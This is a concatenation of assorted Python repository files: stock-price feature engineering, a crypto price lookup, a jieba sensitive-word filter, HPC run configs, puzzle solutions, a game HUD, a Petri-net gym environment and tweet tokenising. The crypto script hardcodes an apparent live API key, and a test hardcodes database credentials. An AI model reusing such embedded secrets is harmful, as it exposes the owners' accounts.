print(\"len(series_normalized)\",len(series_normalized))\n print(\"len(series_return)\", len(series_return))\n\nfor j in range(0, params['stock_count']):\n outputDataFrame = pd.DataFrame(dtype='float64')\n\n currNormalized = df_normalized.ix[:,j]\n currReturn = df_return.ix[:,j]\n currentFile = input_files[j]\n\n diffSquared = []\n #label = 1 and -1 represent increase/decrease in price. If the difference is\n #lower than epsilon, then label =0\n #In order to balance the labels as much as possible, different values of\n #epsilon are experimented and the one that balances the three classes as equally\n #as possible is chosen\n\n for eps in params['list_epsilon']:\n positive = 0\n neutral = 0\n negative = 0\n for i in range (0, min_n-1):\n difference = currNormalized[i+1]-currNormalized[i]\n if (difference>eps):\n positive = positive + 1\n elif (difference < (-1)*eps):\n negative = negative + 1\n else:\n neutral = neutral + 1\n total = positive + negative + neutral\n target = total / 3\n diffSquared.append((positive-target)**2+(negative-target)**2+(neutral-target)**2)\n print(\"epsilon:\", eps)\n print(\"positive:\", positive, positive/total)\n print(\"negative\", negative, negative/total)\n print(\"neutral\", neutral, neutral/total)\n print(\"\")\n\n balEpsilon = params['list_epsilon'][np.argmin(diffSquared)]\n print(\"Selected epsilon\", balEpsilon)\n print(\"\")\n\n seriesLabel = pd.Series(index=currNormalized.index, name=\"Label\"+str(balEpsilon)+currentFile, dtype='float64')\n for i in range (0, min_n-1):\n difference = currNormalized[i+1]-currNormalized[i]\n if (difference>balEpsilon):\n seriesLabel[i]=1\n elif (difference<(-1)*balEpsilon):\n seriesLabel[i]=-1\n else:\n seriesLabel[i]=0\n\n outputDataFrame=pd.concat([outputDataFrame, seriesLabel],axis=1)\n\n #generates lagging columns using normalized price,\n for i in range(1,params['max_lagging']+1):\n seriesLagged = pd.Series(currNormalized.shift(i), index=currNormalized.index, name=\"Lagging \"+str(i)+currentFile, dtype='float64')\n outputDataFrame=pd.concat([outputDataFrame,seriesLagged],axis=1)\n\n #generates moving averages normalized price\n for i in range (params['min_moving_average'], params['max_moving_average']+1):\n seriesMovingAverage = currNormalized\n seriesMovingAverage = pd.rolling_mean(seriesMovingAverage, i)\n seriesMovingAverage = pd.Series(seriesMovingAverage, index=seriesMovingAverage.index, name=\"Moving Average\"+str(i)+currentFile, dtype='float64')\n outputDataFrame = pd.concat([outputDataFrame, seriesMovingAverage], axis=1)\n\n #calculates correlation with different symbols using moving windows.\n #adds very small values of perturbation to avoid division by zero while\n #calculating correlation.\n\n for k in range (j+1, params['stock_count']):\n u = (params['theta'] * balEpsilon)/math.sqrt(params['max_correlation_window'])\n compareFile = input_files[k]\n\n xPrice = currReturn\n yPrice = df_return.ix[:,k]\n xTemp = pd.Series(dtype='float64')\n yTemp = pd.Series(dtype='float64')\n xTemp = xPrice.apply(lambda x: u*(random.uniform(-1,1)))\n yTemp = yPrice.apply(lambda x: u*(random.uniform(-1,1)))\n xPrice = xPrice.add(xTemp)\n yPrice = yPrice.add(yTemp)\n\n seriesCorrelation = pd.Series(index=outputDataFrame.index, name=\"Correlation\"+currentFile+\" VS \"+compareFile, dtype='float64')\n\n for i in range(params['max_correlation_window'], min_n):\n correlation = np.corrcoef(xPrice[i-(params['max_correlation_window'] - 1) : i], yPrice[i-(params['max_correlation_window'] - 1) : i], bias = 1)[0][1]\n 
seriesCorrelation[i] = correlation\n\n outputDataFrame = pd.concat([outputDataFrame, seriesCorrelation], axis=1)\n\n #two output files are prepared\n #size of the ouput is n_min calculated initially\n #size of small output set is defined in params\n\n outputDataFrame = outputDataFrame.dropna()\n smallDataFrame = outputDataFrame.tail(params['small_output_size'])\n\n file = os.path.splitext(currentFile)[0]\n\n dimension = np.array([len(outputDataFrame), len(outputDataFrame.columns)])\n smallDimension = np.array([params['small_output_size'], len(outputDataFrame.columns)])\n\n print(\"dimensions for: \", currentFile)\n print(\"number of rows:\", len(outputDataFrame))\n print(\"number of columns: \", len(outputDataFrame.columns))\n print(\"\")\n\n #append dimension (n_row, n_column) to beginning of file and export to binary\n outputArray = outputDataFrame.as_matrix()\n outputArray=np.append(dimension,outputArray)\n outputArray.astype('float64')\n outputArray.tofile(file+'_large.bin')\n smallOutputArray = smallDataFrame.as_matrix()\n smallOutputArray=np.append(smallDimension,smallOutputArray)\n smallOutputArray.astype('float64')\n smallOutputArray.tofile(file+'_small.bin')\n\n #for outputting to csv format\n # outputDataFrame.to_csv(file+'_largeHybrid.csv',index=False)\n # smallDataFrame.to_csv(file+'_smallHybrid.csv',index=False)\n\n\n\n\n\n","repo_name":"jinhoonbang/python_machine_learning","sub_path":"src/feature_engineering/generate_features.py","file_name":"generate_features.py","file_ext":"py","file_size_in_byte":8777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
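The script stores each symbol as a flat float64 file with the `(n_rows, n_cols)` dimensions prepended as the first two values (`np.append(dimension, outputArray)` flattens before `tofile`). Reading one back is therefore a two-step `fromfile`/`reshape`; the file name below is a placeholder:

```python
import numpy as np

raw = np.fromfile("SYMBOL_large.bin", dtype="float64")
n_rows, n_cols = int(raw[0]), int(raw[1])
features = raw[2:].reshape(n_rows, n_cols)
# column 0 is the label, followed by lags, moving averages and correlations
print(features.shape)
```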
+{"seq_id":"2705195016","text":"\r\nimport requests\r\nimport json\r\n\r\n\r\nAPI_KEY = \"4b9b2e12-caac-4075-8c5b-8633b0163a1f\"\r\n\r\n\r\ndef get_prices():\r\n url = \"https://pro-api.coinmarketcap.com/v1/exchange/quotes/latest\"\r\n headers = {\r\n \"X-CMC_PRO_API_KEY\": API_KEY,\r\n }\r\n params = {\r\n \"id\": \"1,2,3,4,5,6,7,8,9,10\",\r\n \"symbol\": \"ETH\",\r\n \"convert\": \"USD\",\r\n }\r\n response = requests.get(url, headers=headers, params=params)\r\n response_json = response.json()\r\n\r\n\r\n prices = {}\r\n for exchange in response_json[\"data\"]:\r\n name = exchange[\"name\"]\r\n price = exchange[\"quote\"][\"USD\"][\"price\"]\r\n prices[name] = price\r\n\r\n return prices\r\n\r\n\r\ndef find_arbitrage(prices):\r\n\r\n table = PrettyTable()\r\n table.field_names = [\"Exchange\", \"Price\"]\r\n\r\n\r\n for exchange in prices:\r\n price = prices[exchange]\r\n table.add_row([exchange, price])\r\n\r\n\r\n print(table)\r\n\r\n\r\ndef main():\r\n\r\n prices = get_prices()\r\n\r\n\r\n find_arbitrage(prices)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"rexcelArb/researches","sub_path":"Simple ETH Arb.py","file_name":"Simple ETH Arb.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"73102141990","text":"import jieba\n\n\nclass SensitiveConf(object):\n\n def __init__(self):\n self.mysql = None\n self.debug = None\n\n\nclass SensitiveWordDistinguish(object):\n\n def __init__(self, mysql, debug=False):\n self.mysql = mysql\n\n words_list = list()\n for data in mysql.query_sensitive_word():\n jieba.add_word(data['word'])\n words_list.append(data['word'])\n\n self.jieba = jieba\n self.word_list = words_list\n self.debug = debug\n\n def distinguish(self, ask):\n words = self.jieba.lcut(ask)\n\n sensitive_word = [word for word in words if word in self.word_list]\n include_sensitive = False if len(sensitive_word) == 0 else True\n\n return include_sensitive, sensitive_word\n\n\ndef test(test_sentence):\n from module.core.mysql_exec import Mysql\n from module.core.utterance import Utterance\n\n utterance = Utterance(ask=test_sentence)\n\n mysql = Mysql(host='192.168.10.10', user='chatbot', password='chatbot', db='chatbot')\n sensitive_word_distinguish = SensitiveWordDistinguish(mysql)\n result = sensitive_word_distinguish.distinguish(utterance)\n\n print(\"result: \", result.sensitive_word)\n print(\"sentence: \", test_sentence)\n\n\nif __name__ == '__main__':\n test('气枪非常好')\n print()\n test('你好')\n","repo_name":"boyshen/NLP_project","sub_path":"chinese_chatbot/module/sensitive_word/sensitive_word.py","file_name":"sensitive_word.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"71"}
+{"seq_id":"17212165962","text":"#!/usr/bin/env python3\n\nimport os\nimport sys\nimport shutil\nimport copy\nimport json\nsys.path.append(f'{os.environ[\"HOME\"]}/workspace/octotiger-scripts/include')\nfrom script_common import *\n\nbaseline = {\n \"name\": \"lci\",\n \"nnodes_list\": [8],\n \"max_level\": 5,\n \"griddim\": 2,\n \"stop_step\": 30,\n \"zc_threshold\": 8192,\n \"task\": \"rs\",\n \"parcelport\": \"lci\",\n \"protocol\": \"putsendrecv\",\n \"comp_type\": \"queue\",\n \"progress_type\": \"worker\",\n \"prg_thread_num\": \"auto\",\n \"sendimm\": 1,\n \"backlog_queue\": 0,\n \"prepost_recv_num\": 1,\n \"zero_copy_recv\": 1,\n \"match_table_type\": \"hashqueue\",\n \"cq_type\": \"array_atomic_faa\",\n \"reg_mem\": 0,\n \"ndevices\": 4,\n \"ncomps\": 4\n}\n\nconfigs = [\n # baseline,\n {**baseline, \"name\": \"lci_c1\", \"ncomps\": 1},\n {**baseline, \"name\": \"lci_c2\", \"ncomps\": 2},\n {**baseline, \"name\": \"lci_c4\", \"ncomps\": 4},\n # {**baseline, \"name\": \"lci_l5_worker_d1\", \"ndevices\": 1, \"progress_type\": \"worker\"},\n # {**baseline, \"name\": \"lci_l5_worker_d2\", \"ndevices\": 2, \"progress_type\": \"worker\"},\n # {**baseline, \"name\": \"lci_l5_worker_d4\", \"ndevices\": 4, \"progress_type\": \"worker\"},\n # {**baseline, \"name\": \"lci_l5_rp_d1\", \"ndevices\": 1, \"progress_type\": \"rp\"},\n # {**baseline, \"name\": \"lci_l5_rp_d2\", \"ndevices\": 2, \"progress_type\": \"rp\"},\n # {**baseline, \"name\": \"lci_l5_rp_d4\", \"ndevices\": 4, \"progress_type\": \"rp\"},\n # {**baseline, \"name\": \"lci_l5_rp1_d1\", \"ndevices\": 1, \"progress_type\": \"rp\", \"prg_thread_num\": \"1\"},\n # {**baseline, \"name\": \"lci_l5_rp1_d2\", \"ndevices\": 2, \"progress_type\": \"rp\", \"prg_thread_num\": \"1\"},\n # {**baseline, \"name\": \"lci_l5_rp1_d4\", \"ndevices\": 4, \"progress_type\": \"rp\", \"prg_thread_num\": \"1\"},\n]\n\nif __name__ == \"__main__\":\n mkdir_s(\"./run\")\n\n tag = getenv_or(\"RUN_TAG\", \"default\")\n os.environ[\"CURRENT_SCRIPT_PATH\"] = os.path.dirname(os.path.realpath(__file__))\n for config in configs:\n # print(config)\n for nnodes in config[\"nnodes_list\"]:\n run_slurm(tag, nnodes, config)","repo_name":"JiakunYan/octotiger-scripts","sub_path":"rostam/profile/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"12365654741","text":"import pprint\npp = pprint.PrettyPrinter(indent=4)\n\ndef buildPlayerDecks(input):\n player1 = input[1:input.index('')]\n player2 = input[input.index('')+2:]\n\n\n player1 = list(map(int, player1))\n player2 = list(map(int, player2))\n\n return player1, player2\n\ndef takeOneStep(player1, player2):\n player1_card = player1.pop(0)\n player2_card = player2.pop(0)\n\n if player1_card > player2_card:\n player1.extend([player1_card, player2_card])\n if player2_card > player1_card:\n player2.extend([player2_card, player1_card])\n\ndef playFullGame(player1, player2):\n while player1 and player2:\n takeOneStep(player1, player2)\n\ndef calculatePlayerScore(player):\n total = 0\n for i in range(len(player), 0, -1):\n total += i * player[len(player) - i]\n return total\n\ndef a(input):\n # pp.pprint(input)\n player1, player2 = buildPlayerDecks(input)\n # pp.pprint(player1)\n # pp.pprint(player2)\n playFullGame(player1, player2)\n # pp.pprint(player1)\n # pp.pprint(player2)\n if player1:\n return calculatePlayerScore(player1)\n return calculatePlayerScore(player2)\n","repo_name":"EggheadJohnson/AdventOfCode2020","sub_path":"22/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"11079372236","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\n File Name: singleNumber\n Author : jing\n Date: 2020/3/19\n\n https://leetcode-cn.com/explore/interview/card/tencent/223/math-and-numbers/940/\n\n 找出只出现一次的数\n\"\"\"\n\n\nclass Solution:\n def singleNumber(self, nums):\n result = 0\n for num in nums:\n result = result ^ num\n return result\n","repo_name":"summer-vacation/AlgoExec","sub_path":"tencent/math_and_digit/singleNumber.py","file_name":"singleNumber.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"17445547758","text":"from pyglet import gl\n\nfrom .constants import SEA_LEVEL, SCREEN_SIZE\nfrom .primitives import Label, Rectangle\nfrom .camera import Rect\nfrom .vector import v\n\n\nclass GameHud(object):\n def __init__(self, world):\n self.world = world\n\n w, h = SCREEN_SIZE\n r = Rect(v(0, 0), v(250, 113))\n r = r.translate(v(8, h - r.height - 8))\n self.infobox = Rectangle(r, [(0, 0, 0, 0.33)])\n\n self.altlabel = Label(\n text='Altitude:',\n x=20,\n y=h - 35\n )\n self.distlabel = Label(\n text='Distance:',\n x=20,\n y=h - 70\n )\n self.fuellabel = Label(\n text='',\n x=20,\n y=h - 105\n )\n\n self.controllers = []\n\n def set_controllers(self, controllers):\n self.controllers = controllers\n\n def draw(self):\n alt = (self.world.squid.position.y - SEA_LEVEL - 15) * 0.1\n if self.world.goal:\n dist = abs(self.world.goal.left - self.world.squid.position.x) * 0.1\n self.distlabel.document.text = 'Target: %dm' % dist\n else:\n dist = (self.world.squid.position.x - 150) * 0.1\n self.distlabel.document.text = 'Distance: %dm' % dist\n\n if alt < 0:\n self.altlabel.document.text = 'Depth: %dm' % (-alt)\n else:\n self.altlabel.document.text = 'Altitude: %dm' % alt\n\n self.fuellabel.document.text = 'Fuel: %0.1fkg' % self.world.squid.fuel\n if self.world.squid.fuel:\n self.fuellabel.color = (255, 255, 255, 255)\n else:\n if self.world.squid.need_fuel():\n self.fuellabel.color = (255, 0, 0, 255)\n else:\n self.fuellabel.document.text = 'Fuel: N/A'\n self.infobox.draw()\n self.altlabel.draw()\n self.distlabel.draw()\n self.fuellabel.draw()\n\n if self.controllers:\n gl.glPushMatrix()\n gl.glTranslatef(SCREEN_SIZE[0] - 74, 10, 0)\n for controller in reversed(self.controllers):\n controller.draw()\n gl.glTranslatef(-74, 0, 0)\n gl.glPopMatrix()\n","repo_name":"lordmauve/korovic","sub_path":"korovic/hud.py","file_name":"hud.py","file_ext":"py","file_size_in_byte":2174,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"73821035108","text":"import gym\nfrom gym import error, spaces, utils\nfrom gym.utils import seeding\n\nimport numpy as np\nfrom gspn_lib import gspn_tools\nimport sys\n\nclass MultiGSPNenv_v1(gym.Env):\n metadata = {'render.modes': ['human']}\n\n def __init__(self, gspn_model=None, gspn_path=None, n_locations=None, n_robots=None, actions_maps=None,\n reward_function=None, use_expected_time=False, verbose=False, idd=None):\n print('Multi GSPN Gym Env V1')\n self.id = idd\n self.verbose = verbose\n self.n_robots = n_robots\n self.n_locations = n_locations\n self.use_expected_time = use_expected_time\n self.actions_id_to_name = actions_maps[0]\n self.actions_name_to_id = actions_maps[1]\n\n if not reward_function:\n raise Exception('Please select one reward function: either 1 or 2')\n self.reward_function_type = reward_function\n\n if gspn_path != None:\n pn_tool = gspn_tools.GSPNtools()\n self.mr_gspn = pn_tool.import_greatspn(gspn_path)[0]\n # pn_tool.draw_gspn(mr_gspn)\n elif gspn_model != None:\n self.mr_gspn = gspn_model\n else:\n raise Exception('Please provide a GSPN object or a GSPN path of the environment model.')\n\n # Init timestamp\n self.timestamp = 0\n\n # [max_n_tokens_in_place0, max_n_tokens_in_place1, ... max_n_tokens_in_placen]\n # we approximate this to: [n_robots, n_robots, ... nrobots]\n self.observation_space = spaces.MultiDiscrete(nvec=[n_robots]*len(self.mr_gspn.get_current_marking()))\n n_actions = len(self.actions_id_to_name.keys())\n # {0,1,...,n_actions}\n self.action_space = spaces.Discrete(n_actions)\n\n self.enabled_parallel_transitions = {}\n\n def step(self, action):\n # get disabled actions in current state\n disabled_actions_names, disabled_actions_indexes = self.get_disabled_actions()\n\n # get current state\n current_state = self.get_current_state()\n if self.verbose:\n print('S: ', current_state)\n # print('Enabled Timed transitions : ', self.enabled_parallel_transitions)\n\n # map input action to associated transition\n if action in disabled_actions_indexes:\n transition = None\n else:\n transition = self.action_to_transition(action)\n if self.verbose:\n print('Action: ', action, transition)\n\n if transition != None:\n # apply action\n self.mr_gspn.fire_transition(transition)\n\n # get execution time (until the next decision state)\n # get also the sequence of the fired transitions ['t1', 't2', ...]\n elapsed_time, fired_transitions = self.execute_actions(use_expected_time=self.use_expected_time)\n\n reward = self.reward_function(current_state, transition, elapsed_time)\n\n # in a MRS the fired timed transition may not correspond to the selected action\n # this is the expected time that corresponds to the selected action\n action_expected_time = self.get_action_time(transition)\n\n self.timestamp += elapsed_time\n else:\n raise Exception('Disabled transition selected! 
This is not possible.')\n\n if self.verbose:\n print('Reward: ', reward)\n print('Timestamp: ', self.timestamp)\n print('Action expected time: ', action_expected_time)\n # print(\"S actions disabled: \", disabled_actions_names)\n\n # get enabled actions in the next state\n next_state_enabled_actions_names, next_state_enabled_actions_indexes = self.get_enabled_actions()\n\n # get next state\n next_state = self.marking_to_state()\n # next_state_string = self.get_current_state()\n if self.verbose:\n print(\"S': \", self.get_current_state())\n print(\"Available actions in s': \", next_state_enabled_actions_names)\n print()\n\n episode_done = False\n\n return next_state, reward, episode_done, \\\n {'timestamp': self.timestamp,\n 'disabled_actions': (disabled_actions_names, disabled_actions_indexes),\n 'next_state_enabled_actions': (next_state_enabled_actions_names, next_state_enabled_actions_indexes),\n 'action_time': action_expected_time,\n 'fired_transitions': fired_transitions,\n 'action_to_transition': transition}\n\n def reset(self):\n self.timestamp = 0.0\n self.mr_gspn.reset_simulation()\n next_state = self.marking_to_state()\n self.enabled_parallel_transitions = {}\n\n # get enabled actions in the next state\n next_state_enabled_actions_names, next_state_enabled_actions_indexes = self.get_enabled_actions()\n\n return next_state, {'timestamp': self.timestamp, 'actions_info': [],\n 'disabled_actions': (None, None),\n 'next_state_enabled_actions': (\n next_state_enabled_actions_names, next_state_enabled_actions_indexes),\n 'action_time': None}\n\n def render(self, mode='human'):\n raise Exception('Rendering not implemented')\n\n def close(self):\n self.reset()\n # print('Au Revoir Shoshanna!')\n\n def get_current_state(self):\n return self.mr_gspn.get_current_marking(sparse_marking=True)\n\n def action_to_transition(self, action):\n return self.actions_id_to_name[int(action)]\n\n def marking_to_state(self):\n # map dict marking to list marking\n marking_dict = self.mr_gspn.get_current_marking(sparse_marking=True)\n state = [0]*len(self.mr_gspn.get_current_marking().keys())\n for place_name, number_robots in marking_dict.items():\n token_index = self.mr_gspn.places_to_index[place_name]\n state[token_index] = number_robots\n\n return state\n\n def reward_function(self, sparse_state=None, transition=None, elapsed_time=0.0):\n if self.reward_function_type == 1:\n reward = 0.0\n\n if 'Insp' in transition:\n reward += 10.0\n\n elif self.reward_function_type == 2:\n reward = 0.0\n\n if 'Insp' in transition:\n reward += 500.0\n elif ('Charge' in transition) and (not ('Mobile' in transition)):\n reward += 100.0\n elif (not ('Bat' in transition)) and (not ('Mobile' in transition)):\n reward -= 10.0\n else:\n reward = 0.0\n\n if 'Insp' in transition:\n reward += 10.0\n\n robots_discharged = 0\n for local_state, robots in sparse_state.items():\n if 'Low' in local_state:\n robots_discharged += robots\n\n reward -= robots_discharged*elapsed_time\n\n return reward\n\n def fire_timed_transitions(self, enabled_timed_transitions, use_expected_time):\n if use_expected_time:\n # convert the rate into expected time and store that transition if it was not already stored\n for tr_name, tr_rate in enabled_timed_transitions.copy().items():\n if tr_name not in self.enabled_parallel_transitions:\n self.enabled_parallel_transitions[tr_name] = [1.0 / tr_rate]\n\n n_sampled_times = len(self.enabled_parallel_transitions[tr_name])\n tr_index = self.mr_gspn.transitions_to_index[tr_name]\n arcs_in = 
self.mr_gspn.get_arc_in_m()\n places_dict = self.mr_gspn.get_places()\n input_place_ratios = []\n sample_new_time = True\n for i, tr_coord in enumerate(arcs_in.coords[1]):\n if tr_coord == tr_index:\n place_index = arcs_in.coords[0][i]\n place_name = self.mr_gspn.index_to_places[place_index]\n n_tokens = places_dict[place_name]\n arc_weight = arcs_in.data[i]\n ratio = int(n_tokens/arc_weight)\n # the ratio gives us the number of sampled times that must exist in the\n # parallel dict, for this specific transition\n input_place_ratios.append(ratio)\n if ratio <= n_sampled_times:\n sample_new_time = False\n break\n # sample the amount necessary such that the number of\n # sampled times equals the smallest the place ratio\n if sample_new_time and len(input_place_ratios) > 0:\n while len(self.enabled_parallel_transitions[tr_name]) < min(input_place_ratios):\n self.enabled_parallel_transitions[tr_name].append(1.0 / tr_rate)\n\n else:\n # convert the rate into sampled elapsed time\n # sample from each exponential distribution prob_dist(x) = lambda * exp(-lambda * x)\n # in this case the beta rate parameter is used instead, where beta = 1/lambda\n # store enabled transition if it was not already stored\n for tr_name, tr_rate in enabled_timed_transitions.copy().items():\n if tr_name not in self.enabled_parallel_transitions:\n self.enabled_parallel_transitions[tr_name] = [np.random.exponential(scale=(1.0 / tr_rate),\n size=None)]\n\n n_sampled_times = len(self.enabled_parallel_transitions[tr_name])\n tr_index = self.mr_gspn.transitions_to_index[tr_name]\n arcs_in = self.mr_gspn.get_arc_in_m()\n places_dict = self.mr_gspn.get_places()\n input_place_ratios = []\n sample_new_time = True\n for i, tr_coord in enumerate(arcs_in.coords[1]):\n if tr_coord == tr_index:\n place_index = arcs_in.coords[0][i]\n place_name = self.mr_gspn.index_to_places[place_index]\n n_tokens = places_dict[place_name]\n arc_weight = arcs_in.data[i]\n ratio = int(n_tokens / arc_weight)\n # the ratio gives us the number of sampled times that must exist in the\n # parallel dict, for this specific transition\n input_place_ratios.append(ratio)\n if ratio <= n_sampled_times:\n sample_new_time = False\n break\n # sample the amount necessary such that the number of\n # sampled times equals the smallest place ratio\n if sample_new_time and len(input_place_ratios) > 0:\n while len(self.enabled_parallel_transitions[tr_name]) < min(input_place_ratios):\n self.enabled_parallel_transitions[tr_name].append(np.random.exponential(scale=(1.0 / tr_rate),\n size=None))\n # delete the transitions that were enabled, didn't fire and are not longer enabled\n disabled_transitions = set(self.enabled_parallel_transitions.keys())-set(enabled_timed_transitions.keys())\n for tr_name in disabled_transitions:\n del self.enabled_parallel_transitions[tr_name]\n\n # select the transition with the lowest execution time\n execution_time = np.inf\n for tr_name, tr_time in self.enabled_parallel_transitions.items():\n new_min_time = min(tr_time)\n if new_min_time < execution_time:\n timed_transition = tr_name\n execution_time = new_min_time\n\n transitions_to_fire = []\n transitions_to_fire.append(timed_transition)\n\n # delete transition to be fired\n if len(self.enabled_parallel_transitions[timed_transition]) > 1:\n self.enabled_parallel_transitions[timed_transition].remove(execution_time)\n else:\n del self.enabled_parallel_transitions[timed_transition]\n\n # decreased elapsed time for the remaining enabled transitions\n for tr_name, tr_exp_time in 
self.enabled_parallel_transitions.copy().items():\n new_tr_time = list(np.array(tr_exp_time) - execution_time)\n if any(i <= 0 for i in new_tr_time):\n # according to PN formalism there are never two timed transitions\n # with the same elapsed time\n # instead we should sum a very small time (e.g. 1e-6)\n # to ensure that only 1 transition fires at each time\n # when using expected time this arises more often\n pruned_new_tr_time = []\n for remaining_time in new_tr_time:\n if remaining_time <= 0:\n # transitions_to_fire.append(tr_name)\n pruned_new_tr_time.append(1e-6)\n else:\n pruned_new_tr_time.append(remaining_time)\n\n if len(pruned_new_tr_time) > 0:\n self.enabled_parallel_transitions[tr_name] = pruned_new_tr_time\n else:\n del self.enabled_parallel_transitions[tr_name]\n else:\n self.enabled_parallel_transitions[tr_name] = new_tr_time\n\n for transition_name in transitions_to_fire:\n self.mr_gspn.fire_transition(transition_name)\n return execution_time, transitions_to_fire\n\n def fire_random_switch(self, random_switch):\n if len(random_switch) > 1:\n s = sum(random_switch.values())\n random_switch_id = list(random_switch.keys())\n random_switch_prob = np.zeros(len(random_switch))\n # normalize the associated probabilities\n for idx, tr_info in enumerate(random_switch.items()):\n tr_name = tr_info[0]\n tr_weight = tr_info[1]\n random_switch_id[idx] = tr_name\n random_switch_prob[idx] = tr_weight / s\n\n # Draw from all enabled immediate transitions\n firing_transition = np.random.choice(a=random_switch_id, size=None, p=random_switch_prob)\n else:\n # Fire the only available immediate transition\n firing_transition = list(random_switch.keys())[0]\n\n self.mr_gspn.fire_transition(firing_transition)\n\n def check_actions_state(self, enabled_imm_transitions):\n action_enabled = False\n random_switch_available = False\n for tr_name, tr_rate in enabled_imm_transitions.items():\n if tr_rate == 0:\n action_enabled = True\n elif tr_rate != 0:\n random_switch_available = True\n return action_enabled, random_switch_available\n\n def execute_actions(self, use_expected_time=False):\n enabled_timed_transitions, enabled_imm_transitions = self.mr_gspn.get_enabled_transitions()\n\n # check if there is at least one imm transition with weight != 0 and check if there is one with weight == 0\n enabled_actions, random_switch = self.check_actions_state(enabled_imm_transitions)\n\n elapsed_time = 0\n fired_transitions = []\n while random_switch or (not enabled_actions):\n while random_switch:\n self.fire_random_switch(enabled_imm_transitions)\n enabled_timed_transitions, enabled_imm_transitions = self.mr_gspn.get_enabled_transitions()\n enabled_actions, random_switch = self.check_actions_state(enabled_imm_transitions)\n\n while (enabled_timed_transitions and not enabled_actions and not random_switch):\n action_elapsed_time, tr_fired = self.fire_timed_transitions(enabled_timed_transitions,\n use_expected_time)\n elapsed_time += action_elapsed_time\n fired_transitions += tr_fired\n enabled_timed_transitions, enabled_imm_transitions = self.mr_gspn.get_enabled_transitions()\n enabled_actions, random_switch = self.check_actions_state(enabled_imm_transitions)\n\n return elapsed_time, fired_transitions\n\n def get_disabled_actions(self):\n enabled_actions_names, enabled_actions_indexes = self.get_enabled_actions()\n\n disabled_actions_indexes = list(set(self.actions_id_to_name.keys()) - set(enabled_actions_indexes))\n disabled_actions_names = list(set(self.actions_name_to_id.keys()) - 
set(enabled_actions_names))\n\n return disabled_actions_names, disabled_actions_indexes\n\n def get_enabled_actions(self):\n enabled_exp_transitions, enabled_imm_transitions = self.mr_gspn.get_enabled_transitions()\n\n enabled_actions_indexes = []\n enabled_actions_names = []\n for tr_name, tr_rate in enabled_imm_transitions.items():\n if tr_rate == 0:\n enabled_actions_names.append(tr_name)\n enabled_actions_indexes.append(self.actions_name_to_id[tr_name])\n\n return enabled_actions_names, enabled_actions_indexes\n\n def get_action_time(self, fired_transition):\n associated_timed_tr = fired_transition + '_Finished'\n transition_rate = self.mr_gspn.get_transition_rate(associated_timed_tr)\n action_expected_time = 1.0/transition_rate\n return action_expected_time\n\n # def seed(self, seed=None):\n # self.np_random, seed = seeding.np_random(seed)\n # return [seed]","repo_name":"cazevedo/gspn-gym-env","sub_path":"gspn_gym_env/envs/MultiGSPNenv_v1.py","file_name":"MultiGSPNenv_v1.py","file_ext":"py","file_size_in_byte":17697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
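The `fire_timed_transitions` logic in the record above implements GSPN race semantics: each enabled exponential transition gets a sampled (or expected) firing time, the smallest one wins, and the survivors' clocks are decremented by the elapsed time. A standalone sketch of that race, with hypothetical transition names and rates:

```python
import numpy as np

rng = np.random.default_rng(seed=0)
rates = {'t_navigate': 0.5, 't_charge': 0.2}  # hypothetical lambda rates

# One exponential sample per enabled transition (scale = 1/lambda, as above).
clocks = {name: rng.exponential(scale=1.0 / lam) for name, lam in rates.items()}

# The transition with the smallest clock fires first...
winner = min(clocks, key=clocks.get)
elapsed = clocks.pop(winner)

# ...and the remaining clocks are decremented by the elapsed time,
# mirroring the new_tr_time bookkeeping in fire_timed_transitions().
clocks = {name: t - elapsed for name, t in clocks.items()}
print(winner, round(elapsed, 3), clocks)
```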
+{"seq_id":"23887462738","text":"import cPickle\nimport string\nfrom nltk.stem.porter import PorterStemmer as ps\nfrom nltk.corpus import stopwords\n\ndef tok_tweet(tweet):\n stemmer=ps()\n tweet = tweet.strip()\n words = tweet.split()\n tokenlist = []\n exclude = set(string.punctuation)\n punc = string.punctuation\n punc = punc.replace('#','')\n exclude_punc = set(punc)\n\n for word in words:\n word = word.strip()\n word = word.lower()\n\n if word in stopwords.words('english'):\n continue\n\n #Replace URLs with @http and then with blank\n if word.startswith('www') or word.startswith('http') or word.startswith(\"@\") or word.isdigit() or word == 'rt':\n continue #ignore if word is a url, @mention or contains only numbers or is a stopword\n nword = ''.join(ch for ch in word if ch not in exclude_punc)\n tokenlist.append(stemmer.stem(nword))\n tokens= tokenlist\n return ' '.join(tokens)\n\ndef processStatuses(statusFile,textFile):\n corpus = ''\n statuses = cPickle.load(open('data/' + statusFile))\n for status in statuses:\n if status.lang == 'en':\n tweet = tok_tweet(status.text)\n corpus += tweet + ' '\n\n with open('data/'+textFile,'a') as outFile:\n outFile.write(corpus.encode('utf-8'))\n\n return corpus\n\n\n#processStatuses('DendiBoss.p','DendiBoss.out')","repo_name":"viveknabhi/Game-AI-Project","sub_path":"processTweets.py","file_name":"processTweets.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
